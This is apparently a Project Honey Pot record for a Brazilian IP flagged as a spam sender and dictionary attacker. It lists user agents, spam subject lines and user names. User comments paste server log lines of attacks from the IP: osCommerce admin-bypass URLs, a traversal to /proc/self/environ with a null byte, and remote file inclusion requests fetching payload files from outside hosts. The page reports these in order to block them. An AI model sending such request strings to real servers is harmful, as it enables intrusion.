IP Address Inspector

ATTENTION
  • This IP has not seen any suspicious activity within the last 3 months. This IP is most likely clean and trustworthy now. (This record will remain public for historical purposes, however.)

189.14.103.146: Spam Server, Dictionary Attacker

The Project Honey Pot system has detected behavior from the IP address consistent with that of a mail server, dictionary attacker and bad web host. Below we've reported some other data associated with this IP. This interrelated data helps map spammers' networks and aids in law enforcement efforts. If you know something about this IP, please leave a comment.


Geographic Location: Brazil
Spider First Seen: approximately 10 years, 11 months, 2 weeks ago
Spider Last Seen: within 10 years, 1 month, 1 week
Spider Sightings: 37 visit(s)
User-Agents: seen with 8 user-agent(s)

First Received From: approximately 12 years, 6 months, 2 weeks ago
Last Received From: within 10 years, 3 months, 3 weeks
Number Received: 33 email(s) sent from this IP

First Bad Host Appearance: approximately 11 years, 5 weeks ago
Last Bad Host Appearance: within 11 years, 5 weeks
Bad Host Appearances: 99 appearance(s) in spam e-mail or spam post urls

Dictionary Attacks: 5 email(s) sent from this IP
First Received From: approximately 10 years, 7 months, 3 weeks ago
Last Received From: within 10 years, 4 months, 2 weeks

Associated Harvesters

IPs In The Neighborhood
189.14.103.147 Brazil
189.14.104.2 | SD Brazil
189.14.104.18 Brazil
189.14.104.50 | S Brazil

189.14.103.146's User Agent Strings
libwww-perl/5.803
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)
Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)
Mozilla/5.0
Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

Example Messages Sent From 189.14.103.146
Subject: Fotos.
Subject: Fotos.
Subject: Fw: Por favor ajudem a encontrar minha filhinha de
Subject: Fw: Fotos.
Subject: Fw: Fotos.
Subject: Cotacao precos.
Subject: Cotacao precos.
Subject: Cotacao de precos.
Subject: Cotacao de precos.
Subject: Cotacao de precos e produtos listados.
Subject: Planilha precos.
Subject: Re: Cotação preços e produtos.
Subject: Re: Cotação de preços.
Subject: Fw: Segue em anexo relatorio orcamento.
Subject: Fw: Segue em anexo relatorio orcamento.
Subject: Fw: Segue em anexo relatorio orcamento

Example User Names Used By 189.14.103.146
User-name: leone_j_oroz
User-name: jenisalvage
User-name: jasper.babjeck
User-name: manlikemammano
User-name: rubyhguitian

J.Woody commented...
ATTEMPTED ATTACK ON ADMIN
189.14.103.146 - - [02/Jun/2011:05:56:45 +0100] "GET /product_info.php?products_id=5/admin/file_manager.php/login.php HTTP/1.1" 403 1224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
189.14.103.146 - - [02/Jun/2011:05:56:45 +0100] "GET /admin/file_manager.php/login.php HTTP/1.1" 403 1224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
189.14.103.146 - - [02/Jun/2011:05:59:48 +0100] "GET /product_info.php?products_id=5/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 1224 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
189.14.103.146 - - [02/Jun/2011:05:59:49 +0100] "GET /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 403 1224 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
June 04 2011 07:59 AM

E.Stone commented...
Sat, 19 Mar 2011 08:59:42 -0400
Host: web-srv02.acaonet.com.br
IP: 189.14.103.146
Score: 5
Violation count: 1 INSTA-BANNED
Why blocked: RFI attack/SQL injection (Unprintable ASCII escaping). Null truncation attempt. No known valid perl clients or spiders. Infected machine. INSTA-BAN Bot Detection, INSTA-BAN. Directory traversal attack
You have been instantly banned due to extremely hazardous behavior!
Query: area=../../../../../../../../../../../../../../../proc/self/environ%00
Referer:
User Agent: libwww-perl/5.803
Reconstructed URL: http:// www.mysite.com /?area=../../../../../../../../../../../../../../../proc/self/environ%00
March 19 2011 09:17 AM

K.Penton commented...
Attempt to exploit MODx vulnerability:
[25/Feb/2011:06:42:04 GET /ditto//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.blejtash.com//includes/ID-RFI.txt?? HTTP/1.1
February 25 2011 07:26 PM

R.Rivenell commented...
This site (189.14.103.146) is unfortunately still active: I have not long received an e-mail allegedly from a Brazilian bank asking me to enter the usual details. Of course I don't have a Brazilian bank a/c; it's just mass mailing. The headers as usual supplied the above address.
November 28 2010 03:36 AM

J.Brisebois commented...
On 01/04/10 2:16:27 PM CST the IP 189.14.103.146 requested URI www.grynmoors.org/?page=http://www.youronlive.com/modules/Forums/admin/id1.txt??. They came from [ ] with user agent [Mozilla/5.0 ]. This activity resulted in an automatic and immediate ban via .htaccess.
January 05 2010 01:43 AM

J.Brisebois commented...
On 01/04/10 2:16:27 PM CST the IP 189.14.103.146 requested URI www.grynmoors.org/articles.php%253Fpage%253Dlinks/?page=http://www.youronlive.com/modules/Forums/admin/id1.txt??. They came from [ ] with user agent [Mozilla/5.0 ]. This activity resulted in an automatic and immediate ban via .htaccess.
January 05 2010 01:42 AM

J.Brisebois commented...
Again...

On 01/04/10 2:08:25 PM CST the IP 189.14.103.146 requested URI xxxxx-page.com/?page=http://www.youronlive.com/modules/Forums/admin/id1.txt??. They came from [ ] with user agent [Mozilla/5.0 ]. This activity resulted in an automatic and immediate ban via .htaccess.
January 05 2010 01:34 AM

J.Brisebois commented...
ATTEMPTED ATTACK ON SERVER: Greetings! I caught a douchebag today at 12/21/09 11:44:15 PM CST. I banned IP 189.14.103.146 from the requested URI xxxxxxxxxx.com/errors.php?error=http://www.hyonsvc.co.kr//bbs//upload/id1.txt?? They came from referrer [ ] with user agent Mozilla/5.0
December 22 2009 02:05 AM

Page generated on: August 05 2021 05:42:46 PM

Copyright © 2004–21, Unspam Technologies, Inc. All rights reserved.
